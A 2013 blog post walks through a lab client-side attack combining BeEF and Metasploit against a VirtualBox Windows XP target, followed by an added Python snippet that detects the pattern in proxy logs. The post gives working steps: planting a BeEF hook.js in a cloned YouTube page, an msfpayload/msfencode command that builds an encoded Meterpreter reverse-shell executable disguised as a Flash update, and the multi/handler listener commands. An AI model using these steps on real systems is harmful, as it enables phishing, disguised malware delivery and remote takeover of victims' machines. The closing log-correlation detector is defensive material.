Sunday 19 May 2013

Client side attack combination using BeEF and Metasploit

Hello again. In this post I will simulate a client-side attack using BeEF and Metasploit. A client-side attack is an attack carried out on the client side. In this simulation I am using Windows XP in VirtualBox, with the Firefox browser, as the target.

Here's the gameplay:
1. the attacker sends the target a link to a YouTube page that contains the hook.js file from BeEF
2. when the target opens the link, BeEF hooks the target's browser
3. the attacker sends a fake JavaScript update .exe that contains a payload from Metasploit
4. the target clicks the update and the system is pwned

And here are the steps:
- choose a video on YouTube, save the page as youtube.html and put it in /var/www/


- run BeEF from the BackTrack menu: backtrack > exploitation > social engineering tools > BeEF


- modify youtube.html and insert the hook.js script



- open the infected HTML file in the target's browser


- open the BeEF panel in BackTrack's browser; the address is 192.168.56.1:3000/ui/panel

- the target's browser is successfully hooked by BeEF


- create the fake update .exe file using Metasploit
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=1234 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/flashupdate.exe



- run Metasploit (msfconsole) and listen on port 1234
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.1
set LPORT 1234
exploit



- send the payload file with the redirect browser command in BeEF


- execute the file



- Voila! the system is pwned!
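
From the defender's side, the steps above leave a recognisable trail in web proxy logs: a client fetches hook.js from a host and shortly afterwards downloads an .exe from that same host. The following is an added example, not part of the original post, that correlates those two events; the log format, the one-hour window and the sample lines are constructed assumptions.

```python
"""Flag clients that fetch a hook.js script and later download an .exe
from the same host (the hook-then-fake-update pattern)."""
from urllib.parse import urlsplit

# Constructed sample proxy log: "<epoch> <client_ip> <method> <url>".
# The format is an assumption; adapt parse_line() to your proxy.
SAMPLE_LOG = """\
1368950400 192.168.56.101 GET http://192.168.56.1/youtube.html
1368950401 192.168.56.101 GET http://192.168.56.1:3000/hook.js
1368950402 192.168.56.102 GET http://updates.example.com/setup.exe
1368950460 192.168.56.101 GET http://192.168.56.1/flashupdate.exe
1368950470 192.168.56.103 GET http://cdn.example.com/js/hook.js
malformed line
"""

def parse_line(line):
    """Return (timestamp, client, url) or None for unparsable lines."""
    parts = line.split()
    if len(parts) != 4 or not parts[0].isdigit():
        return None
    return int(parts[0]), parts[1], parts[3]

def find_hook_then_exe(log_text, window=3600):
    """Return alerts for .exe downloads that follow a hook.js fetch by the
    same client from the same host (port ignored) within `window` seconds."""
    hooked = {}   # (client, host) -> time of last hook.js fetch
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, client, url = rec
        u = urlsplit(url)
        host, path = u.hostname, u.path.lower()
        if host is None:
            continue
        if path.endswith("/hook.js"):
            hooked[(client, host)] = ts
        elif path.endswith(".exe"):
            seen = hooked.get((client, host))
            if seen is not None and 0 <= ts - seen <= window:
                alerts.append({"client": client, "host": host,
                               "exe": u.path, "seconds_after_hook": ts - seen})
    return alerts

if __name__ == "__main__":
    for alert in find_hook_then_exe(SAMPLE_LOG):
        print(alert)
```

The filename match is a heuristic tied to the script name used in this post; treat a hit as a lead to investigate rather than proof of compromise.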

